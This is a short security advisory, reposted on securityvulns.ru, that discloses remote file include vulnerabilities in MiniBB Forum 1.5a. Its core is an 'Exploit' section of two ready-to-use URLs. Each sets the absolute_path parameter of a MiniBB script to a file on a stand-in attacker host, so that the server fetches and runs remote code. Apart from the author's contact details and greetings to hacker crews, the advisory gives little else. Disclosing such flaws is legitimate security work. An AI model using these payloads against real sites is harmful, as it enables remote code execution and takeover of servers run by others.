Computer Security

Security Advisory: MiniBB Forum <= 1.5a Remote File Include Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities

  [KurdishVanilla CMS <= 1.0.1 (RootDirectory)
Remote file inclusion Vuln.]

  [Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo & Joomla]

  DotClear : Multiples Full Path Disclosure

From:matdhule_(at)_gmail.com <matdhule_(at)_gmail.com>
Date:24.07.2006
Subject:MiniBB Forum <= 1.5a Remote File Include Vulnerabilities

---------------------------------------------------------------------------------

MiniBB Forum <= 1.5a Remote File Include Vulnerabilities
---------------------------------------------------------------------------------


Author : Matdhule

Contact : matdhule@gmail.com

Application : MiniBB Forum (com_minibb.php & index.php)

Version : 1.5a

---------------------------------------------------------------------------------


Exploit :

http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/minibb/index.php?absolute_path=http://attacker.com/evil.txt?

---------------------------------------------------------------------------------


Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, & all crews #mardongan, #jambihackerlink @dalnet

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru